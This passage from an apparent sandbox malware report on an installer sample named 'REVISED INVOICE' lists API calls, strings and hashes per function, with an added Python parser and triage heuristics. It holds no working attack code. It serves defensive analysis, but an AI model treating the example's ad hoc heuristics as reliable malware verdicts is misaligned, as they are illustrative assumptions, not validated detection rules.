• Instruction Fuzzy Hash: B711946A80021295EB313B198C40AB7B6F8EF59750F56417FED86B32C0E77C5C9286ED
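The per-function listings above follow a fixed textual shape: API calls as `Name.MODULE(args), ref: ADDR` (with `Part of subcall function ADDR:` prefixes for callees, and no parentheses where the sandbox recorded no arguments, as for MulDiv), strings as `text, xrefs: ADDR`, and `$`-separated API and String IDs under Similarity. The Python below is an added example for this page, not Joe Sandbox code: it parses that shape into records and runs a few triage heuristics over them. The embedded sample is constructed from values copied from the listings above, and the heuristics (ShellExecuteW with an `open` verb, SHBrowseForFolderW, a Temp-directory string) are this example's own assumptions, not the sandbox's signatures.

```python
"""Parse Joe Sandbox per-function listings (APIs / Strings / Similarity) into
records and run a few triage heuristics. Added example for this report page,
not Joe Sandbox code; the line format is inferred from the listings above and
the triage rules are this example's own illustrative assumptions."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: lines in the shape of this report's function blocks
# (values copied from the listing above), so the parser runs offline.
SAMPLE = """\
APIs
• GetDlgItem.USER32(?,000003FB), ref: 004045CD
• SHBrowseForFolderW.SHELL32(?), ref: 004046A8
• lstrcmpiW.KERNEL32(antireform,00422708,00000000,?,?), ref: 004046E5
  • Part of subcall function 004062B3: CharNextW.USER32(00409300), ref: 00406316
• MulDiv.KERNEL32 ref: 004047E1
• ShellExecuteW.SHELL32(0000070B,open,004271C0,00000000,00000000,00000001), ref: 00404497
Strings
• *?|<>/":, xrefs: 00406305
• C:\\Users\\user\\AppData\\Local\\Temp\\, xrefs: 004062B4
Similarity
• API ID: CharItemText$Next$Prev
• String ID: A$C:\\Users\\user\\AppData\\Local\\fona\\Kvit$antireform
"""

HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Similarity", "Joe Sandbox IDA Plugin"}
# "• Name.MODULE(args), ref: ADDR"; parentheses and comma are absent for e.g.
# MulDiv, and subcall lines carry a "Part of subcall function ADDR:" prefix.
API_RE = re.compile(
    r"^\s*• (?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<name>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-F]{8})\s*$"
)
STRING_RE = re.compile(r"^\s*• (?P<text>.*), xrefs: (?P<refs>[0-9A-F]{8}(?:, [0-9A-F]{8})*)\s*$")
ID_RE = re.compile(r"^\s*• (?P<kind>API|String) ID: (?P<ids>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                    # call-site address inside the dumped image
    subcall_of: Optional[str]   # callee address when listed as a subcall


@dataclass
class FunctionBlock:
    apis: List[ApiCall] = field(default_factory=list)
    strings: Dict[str, List[int]] = field(default_factory=dict)
    api_ids: List[str] = field(default_factory=list)
    string_ids: List[str] = field(default_factory=list)


def parse_block(text: str) -> FunctionBlock:
    """Turn one function listing into a FunctionBlock; raise on unreadable lines."""
    block, section = FunctionBlock(), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in HEADINGS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(raw)
            if not m:
                raise ValueError(f"unparsed API line: {raw!r}")
            args = m["args"].split(",") if m["args"] else []
            block.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), m["sub"]))
        elif section == "Strings":
            m = STRING_RE.match(raw)
            if not m:
                raise ValueError(f"unparsed string line: {raw!r}")
            block.strings[m["text"]] = [int(r, 16) for r in m["refs"].split(", ")]
        elif section == "Similarity":
            m = ID_RE.match(raw)
            if m:               # "$" separates the report's ID groups
                setattr(block, "api_ids" if m["kind"] == "API" else "string_ids", m["ids"].split("$"))
    return block


def triage(block: FunctionBlock) -> List[str]:
    """Illustrative heuristics (this example's assumptions, not sandbox rules)."""
    findings = []
    for call in block.apis:
        where = f"{call.name}.{call.module} @ {call.ref:08X}"
        if call.name == "ShellExecuteW" and "open" in call.args:
            findings.append(f"launches a target with the 'open' verb: {where}")
        elif call.name == "SHBrowseForFolderW":
            findings.append(f"interactive folder picker (installer-style UI): {where}")
    for text, refs in block.strings.items():
        if "\\AppData\\Local\\Temp\\" in text:
            findings.append(f"references the user Temp directory: {text!r} @ {refs[0]:08X}")
    return findings
```

Call `triage(parse_block(text))` on one function block copied out of the report; because every block on this page has the same shape, the same parser turns the whole listing into records that can be searched for call patterns (for instance ShellExecuteW together with a verb string, or CreateFileW paired with [Rename]) instead of reading the blocks one by one.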
APIs
• GetWindowLongW.USER32(?,000000EB), ref: 00404167
• GetSysColor.USER32(00000000,?), ref: 00404183
• SetTextColor.GDI32(?,00000000), ref: 0040418F
• SetBkMode.GDI32(?,?), ref: 0040419B
• GetSysColor.USER32(?), ref: 004041AE
• SetBkColor.GDI32(?,?), ref: 004041BE
• DeleteObject.GDI32(?), ref: 004041D8
• CreateBrushIndirect.GDI32(?), ref: 004041E2
Memory Dump Source
• Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
Similarity
                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2320649405-0
                                                                                                • Opcode ID: bdecbf54746ac4e95bafbcd3f7306951f606de83f5b9b49a03f8dc0a3bab15ec
                                                                                                • Instruction ID: 457b5273a6ad35ed29f896ddd043663fa6b3a1b95e22c78e57b6691615e2b460
                                                                                                • Opcode Fuzzy Hash: bdecbf54746ac4e95bafbcd3f7306951f606de83f5b9b49a03f8dc0a3bab15ec
                                                                                                • Instruction Fuzzy Hash: 1921A1B1804704ABCB219F68DD4CB4BBBF8AF40710F048A29ED92E62E0D734E944CB65
                                                                                                APIs
                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 0040264D
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                  • Part of subcall function 00405CD5: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405CEB
                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                • String ID: 9
                                                                                                • API String ID: 163830602-2366072709
                                                                                                • Opcode ID: 54de609a95a039770bb902f2e006f13192118be6fe7c7de42288ab6e45ce79fa
                                                                                                • Instruction ID: 56da5788d6d90062f79809d4a3c22d6e203981add65e083e01e3e907f30c056e
                                                                                                • Opcode Fuzzy Hash: 54de609a95a039770bb902f2e006f13192118be6fe7c7de42288ab6e45ce79fa
                                                                                                • Instruction Fuzzy Hash: 3F512774D0021AAADF209F94CA88AAEB779FF04344F50447BE501F72E0D7B99D429B69
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B6
                                                                                                • lstrlenW.KERNEL32(00403160,004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C6
                                                                                                • lstrcatW.KERNEL32(004216E8,00403160,00403160,004216E8,00000000,0040FEC0,00000000), ref: 004051D9
                                                                                                • SetWindowTextW.USER32(004216E8,004216E8,00000000,0040FEC0,00000000,?,?,?,?,?,?,?,?,?,00403160), ref: 004051EB
                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405211
                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040522B
                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405239
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                • String ID:
                                                                                                • API String ID: 2531174081-0
                                                                                                • Opcode ID: b3b426c8c96c0d6a6cce16e65ff4c744bbf9f5044ab1cc25101196bb62a9e0e5
                                                                                                • Instruction ID: 21bddbe199db3e121897d5596c22f00b0e76f5ccd37bc28327e30b1938552548
                                                                                                • Opcode Fuzzy Hash: b3b426c8c96c0d6a6cce16e65ff4c744bbf9f5044ab1cc25101196bb62a9e0e5
                                                                                                • Instruction Fuzzy Hash: 9E219D71900118BACB219FA5DD84ACFBFB9EF58350F14807AF904B62A0C7798A41CF68
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A63
                                                                                                • GetMessagePos.USER32 ref: 00404A6B
                                                                                                • ScreenToClient.USER32(?,?), ref: 00404A85
                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A97
                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404ABD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                • String ID: f
                                                                                                • API String ID: 41195575-1993550816
                                                                                                • Opcode ID: 8f99d7edcbb1b2af9b03d3486fc4037292eab20d77c75a8c6737f0729fb79e96
                                                                                                • Instruction ID: 42cc3fd90da340ed33e1658783c39be2c5e0210da91f3d0a8fd677c6224e58ad
                                                                                                • Opcode Fuzzy Hash: 8f99d7edcbb1b2af9b03d3486fc4037292eab20d77c75a8c6737f0729fb79e96
                                                                                                • Instruction Fuzzy Hash: 19015E71E40218BADB00DB94DD85FFEBBBCAF54711F10016BBB11B61D0D7B8AA058BA5
                                                                                                APIs
                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                • MulDiv.KERNEL32 ref: 00402D4D
                                                                                                • wsprintfW.USER32 ref: 00402D5D
                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402D6D
                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F
                                                                                                Strings
                                                                                                • verifying installer: %d%%, xrefs: 00402D57
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                • String ID: verifying installer: %d%%
                                                                                                • API String ID: 1451636040-82062127
                                                                                                • Opcode ID: a68141ec73b2a7b0005fea9bea2e0a343ee18c9164241d5958d7192c74469446
                                                                                                • Instruction ID: 02b4a25e1ca2abb3aa07e0940f0a1006ed88c36cf357b8fab3844828eab6b7e4
                                                                                                • Opcode Fuzzy Hash: a68141ec73b2a7b0005fea9bea2e0a343ee18c9164241d5958d7192c74469446
                                                                                                • Instruction Fuzzy Hash: 3E01F471640209ABEF249F61DD49FEA3B69EB04305F008035FA05A92D1DBB999548F59
                                                                                                APIs
                                                                                                • GetDC.USER32(?), ref: 00401D59
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A,00000048), ref: 00401D66
                                                                                                • MulDiv.KERNEL32 ref: 00401D75
                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                • CreateFontIndirectW.GDI32(0040BDD0), ref: 00401DD1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                • String ID: Tahoma
                                                                                                • API String ID: 3808545654-3580928618
                                                                                                • Opcode ID: 787a0cc1cae73e127cbf34e01b63a76a3b17128f4cf73ed1ac2ca508eda492e0
                                                                                                • Instruction ID: f0de02ddeea559f0acc09b7c654b6cc4e6647674a776793065cdf7257ef1e696
                                                                                                • Opcode Fuzzy Hash: 787a0cc1cae73e127cbf34e01b63a76a3b17128f4cf73ed1ac2ca508eda492e0
                                                                                                • Instruction Fuzzy Hash: FF01A231948244BFE701ABB0AE5EBDA7F74EB65305F004479F551B62E2C77810008B6E
                                                                                                APIs
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                • String ID:
                                                                                                • API String ID: 2667972263-0
                                                                                                • Opcode ID: 87880a874489fc218ffeed1bb5b7a61d92979f204a9b9b6f840c636aa4f91737
                                                                                                • Instruction ID: ec7c0e824f3835a9a78c8c015c1ffbc75d15747d838d6b82ce361eed526a9b83
                                                                                                • Opcode Fuzzy Hash: 87880a874489fc218ffeed1bb5b7a61d92979f204a9b9b6f840c636aa4f91737
                                                                                                • Instruction Fuzzy Hash: 1B219E72C00118BBCF216FA5CD49D9E7E79EF09324F24027AF520762E1C7796D419BA9
                                                                                                APIs
                                                                                                • WideCharToMultiByte.KERNEL32(?,?,brandenes\opinionsdanner\Dagsudflugt,000000FF,open C:\Users\user\Desktop\bhabar\biffins.Unr,00000400,?,?,00000021), ref: 00402583
                                                                                                • lstrlenA.KERNEL32(open C:\Users\user\Desktop\bhabar\biffins.Unr,?,?,brandenes\opinionsdanner\Dagsudflugt,000000FF,open C:\Users\user\Desktop\bhabar\biffins.Unr,00000400,?,?,00000021), ref: 0040258E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWidelstrlen
                                                                                                • String ID: brandenes\opinionsdanner\Dagsudflugt$open C:\Users\user\Desktop\bhabar\biffins.Unr
                                                                                                • API String ID: 3109718747-4001181529
                                                                                                • Opcode ID: 41a6a179fb68a1dd8f2227d4bb464c028c2f78b5ef8fee0b912b5d320b399072
                                                                                                • Instruction ID: bfa6d714be92c4527cef4f8895cb5ef110114927b7979418da5827123998f54c
                                                                                                • Opcode Fuzzy Hash: 41a6a179fb68a1dd8f2227d4bb464c028c2f78b5ef8fee0b912b5d320b399072
                                                                                                • Instruction Fuzzy Hash: AE110A72A41204BEDB10AFB58F4AE9E3669AF54394F20403BF402F61C2D6FC8E41466D
                                                                                                APIs
                                                                                                • CreateDirectoryW.KERNEL32(?,00409300,C:\Users\user\AppData\Local\Temp\), ref: 00405690
                                                                                                • GetLastError.KERNEL32 ref: 004056A4
                                                                                                • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056B9
                                                                                                • GetLastError.KERNEL32 ref: 004056C3
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405673
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 3449924974-4017390910
                                                                                                • Opcode ID: 1b2f11e61ef5d0ea47512485c2032ecfb56833f92387a3fb2d2f530f64b4175b
                                                                                                • Instruction ID: d2f3f002a39499475f228c0a6bab6309b881bedc09a5d6a8f103fb05119b383a
                                                                                                • Opcode Fuzzy Hash: 1b2f11e61ef5d0ea47512485c2032ecfb56833f92387a3fb2d2f530f64b4175b
                                                                                                • Instruction Fuzzy Hash: DE010871D14219EAEF119FA0CD047EFBFB8EB14314F10853AD909B6190E779A604CFAA
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                • LoadImageW.USER32 ref: 00401D2E
                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                • String ID:
                                                                                                • API String ID: 1849352358-0
                                                                                                • Opcode ID: 46a566bd88e14f988bb6b4d3647cfc8d42b3f26eb96179daab85898a76a231e8
                                                                                                • Instruction ID: fda10597d29eaa6b078217e10feb255e8dba845150ef54d65940bec6a2f4d034
                                                                                                • Opcode Fuzzy Hash: 46a566bd88e14f988bb6b4d3647cfc8d42b3f26eb96179daab85898a76a231e8
                                                                                                • Instruction Fuzzy Hash: 3AF0C972A04104AFDB11DBA4EE88CEEBBBDEB48311B104566F602F61A1C675ED418B39
                                                                                                APIs
                                                                                                • lstrlenW.KERNEL32(00422708,00422708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049DB
                                                                                                • wsprintfW.USER32 ref: 004049E4
                                                                                                • SetDlgItemTextW.USER32(?,00422708), ref: 004049F7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.378257129.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.378189875.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378263490.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378271848.0000000000462000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.378511911.0000000000466000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_REVISED INVOICE.jbxd
                                                                                                Similarity
                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                • String ID: %u.%u%s%s
                                                                                                • API String ID: 3540041739-3551169577
                                                                                                • Opcode ID: d85f7ca716c1f5658b91c6656715b5566f7677be60d31edad64312fde4761ef2
                                                                                                • Instruction ID: f455ebafcbecf6c6930287b8ee8bcbe2db44ea01d8d71c40407b913fda14730a
                                                                                                • Opcode Fuzzy Hash: d85f7ca716c1f5658b91c6656715b5566f7677be60d31edad64312fde4761ef2
                                                                                                • Instruction Fuzzy Hash: D611D87364412867DB10A6BD9C45EAF3288DB85374F250237FA26F61D2DA798C6182D8
                                                                                                APIs
